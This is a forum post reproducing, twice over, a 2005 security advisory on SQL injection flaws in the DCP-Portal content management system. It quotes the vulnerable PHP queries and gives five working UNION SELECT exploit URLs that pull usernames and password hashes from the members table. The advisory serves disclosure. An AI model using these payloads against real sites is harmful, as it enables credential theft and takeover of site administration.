Exoduks
16/02/05, 21:25
http://www.hackgen.org/advisories/hackgen-2005-003.txt
'''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''
' [hackgen-2005-#003] '
'''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''
' SQL injection bugs in DCP-Portal '
'''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''
Software: DCP-Portal <= 6.1.1
Homepage: http://www.dcp-portal.org
Author: "Exoduks" - HackGen Team
Release Date: 16 March, 2005
Website: www.hackgen.org
Mail: exoduks [at] gmail . com
0x01 - Affected software description:
-------------------------------------
DCP-Portal is a content management system with advanced features like web
based update, link, file, member management, poll, calendar, content informer,
content sending by members etc. Features: Admin panel to manage the entire site;
HTML editor to add news and content; Members can submit news and contents, and
write reviews; Members can receive the added content in e-mail; Mailing list;
Search engine; Content categories; FAQ; Easy setup; Multi-language support; Forum;
Message system; member agenda; Ad management. Site design can be changed with just
one template file, publish in homepage option, .txt file import for contents,
featured module, works with register_globals=off..
0x02 - Vulnerability Discription:
---------------------------------
Vulnerabilities exist in prety much all sql queries, some of them are in index.php
and forums.php. There isn't eny filtering for input string in all $_GET and $_POST
variables. So it is possible to input evil sql query that will give us for example
hashed password of user we want. This bug is very critical because we can get and
admin password. So some evil user deface portal, or delate all database. This can
be exploited if magic_quotes_gpc is set to Off in php.ini
0x03 - Vulnerability Code:
--------------------------
Vulnerability code in index.php
----- beging the code in index.php -----
....
$result = mysql_query("SELECT * FROM $t_members WHERE uid = '".$_GET["uid"]."' AND hideinfo != '1' ORDER BY username");
....
$sql = mysql_query("SELECT id, name, content FROM $t_faq WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");
....
$sql = mysql_query("SELECT id, name FROM $t_links WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");
....
$result = mysql_query("SELECT * FROM $t_docs WHERE cat_id = '".$_GET["dcat"]."' AND active = '1' ORDER BY date DESC");
....
----- end of the code -----
Vulnerability code in forums.php
----- beging the code in forums.php -----
....
$result = mysql_query("SELECT * FROM $t_forums WHERE fid = '".$_GET["bid"]."'");
....
$result = mysql_query("SELECT * FROM $t_forum_msg WHERE tid = '".$_GET["mid"]."'");
....
----- end of the code -----
0x04 - How to fix this bug:
---------------------------
Vendor has beed contacted and he we probably publish new version of portal so go to
http://www.dcp-portal.org and look for new version.
0x05 - Exploit:
----------------
http://server.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM
dcp5_members WHERE username=%27[username]
http://server.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password,
null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null,
null,null,null,password,null,null,null,null,null,n ull,null,null,null,null,null,null FROM dcp5_members
WHERE username=%27[username]
http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null,
username,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM
dcp5_members WHERE username=%27[username]
Replace [username] with username which you want to get password for and if you need change
dcp5_ prefix. I have tested this on DCP-Portal v6.1.1 and it works !
0x006 - The End:
----------------
And you have come to end. My threed advisor is out.
Grejtttzz to: All people who are working on phearless zine which can be readed on
http://phearless.headcoders.net
______________________________________
Written By Exoduks - www.hackgen.org
'''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''
' [hackgen-2005-#003] '
'''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''
' SQL injection bugs in DCP-Portal '
'''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''
Software: DCP-Portal <= 6.1.1
Homepage: http://www.dcp-portal.org
Author: "Exoduks" - HackGen Team
Release Date: 16 March, 2005
Website: www.hackgen.org
Mail: exoduks [at] gmail . com
0x01 - Affected software description:
-------------------------------------
DCP-Portal is a content management system with advanced features like web
based update, link, file, member management, poll, calendar, content informer,
content sending by members etc. Features: Admin panel to manage the entire site;
HTML editor to add news and content; Members can submit news and contents, and
write reviews; Members can receive the added content in e-mail; Mailing list;
Search engine; Content categories; FAQ; Easy setup; Multi-language support; Forum;
Message system; member agenda; Ad management. Site design can be changed with just
one template file, publish in homepage option, .txt file import for contents,
featured module, works with register_globals=off..
0x02 - Vulnerability Discription:
---------------------------------
Vulnerabilities exist in prety much all sql queries, some of them are in index.php
and forums.php. There isn't eny filtering for input string in all $_GET and $_POST
variables. So it is possible to input evil sql query that will give us for example
hashed password of user we want. This bug is very critical because we can get and
admin password. So some evil user deface portal, or delate all database. This can
be exploited if magic_quotes_gpc is set to Off in php.ini
0x03 - Vulnerability Code:
--------------------------
Vulnerability code in index.php
----- beging the code in index.php -----
....
$result = mysql_query("SELECT * FROM $t_members WHERE uid = '".$_GET["uid"]."' AND hideinfo != '1' ORDER BY username");
....
$sql = mysql_query("SELECT id, name, content FROM $t_faq WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");
....
$sql = mysql_query("SELECT id, name FROM $t_links WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");
....
$result = mysql_query("SELECT * FROM $t_docs WHERE cat_id = '".$_GET["dcat"]."' AND active = '1' ORDER BY date DESC");
....
----- end of the code -----
Vulnerability code in forums.php
----- beging the code in forums.php -----
....
$result = mysql_query("SELECT * FROM $t_forums WHERE fid = '".$_GET["bid"]."'");
....
$result = mysql_query("SELECT * FROM $t_forum_msg WHERE tid = '".$_GET["mid"]."'");
....
----- end of the code -----
0x04 - How to fix this bug:
---------------------------
Vendor has beed contacted and he we probably publish new version of portal so go to
http://www.dcp-portal.org and look for new version.
0x05 - Exploit:
----------------
http://server.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM
dcp5_members WHERE username=%27[username]
http://server.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password,
null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null,
null,null,null,password,null,null,null,null,null,n ull,null,null,null,null,null,null FROM dcp5_members
WHERE username=%27[username]
http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null,
username,null,null,null FROM dcp5_members WHERE username=%27[username]
http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM
dcp5_members WHERE username=%27[username]
Replace [username] with username which you want to get password for and if you need change
dcp5_ prefix. I have tested this on DCP-Portal v6.1.1 and it works !
0x006 - The End:
----------------
And you have come to end. My threed advisor is out.
Grejtttzz to: All people who are working on phearless zine which can be readed on
http://phearless.headcoders.net
______________________________________
Written By Exoduks - www.hackgen.org